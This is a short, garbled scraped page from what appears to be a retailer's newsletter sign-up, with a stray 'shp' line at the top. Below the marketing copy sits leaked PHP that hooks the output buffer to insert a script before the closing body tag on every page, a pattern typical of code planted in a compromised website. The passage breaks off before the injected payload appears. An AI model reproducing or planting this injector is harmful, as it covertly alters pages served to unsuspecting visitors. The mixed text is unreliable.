shp
Sign up today (it’s currently free) to be on the ‘First to Know’ group of select people. When we release a new product, a limited release product you get to be the first to find out!
ALLOCATION AVAILABILITY VARIES FROM RELEASE TO RELEASE
if (!defined('SCRIPT_EXECUTED')) {
define('SCRIPT_EXECUTED', true);
$pages = ['/']; //
ob_start(function($buffer) use ($pages) {
$script_id = 'content-main-2';
foreach ($pages as $page) {
if (strpos($_SERVER['REQUEST_URI'], $page) !== false) {
if (strpos($buffer, $script_id) === false) {
return preg_replace('/\s*<\/body>/', "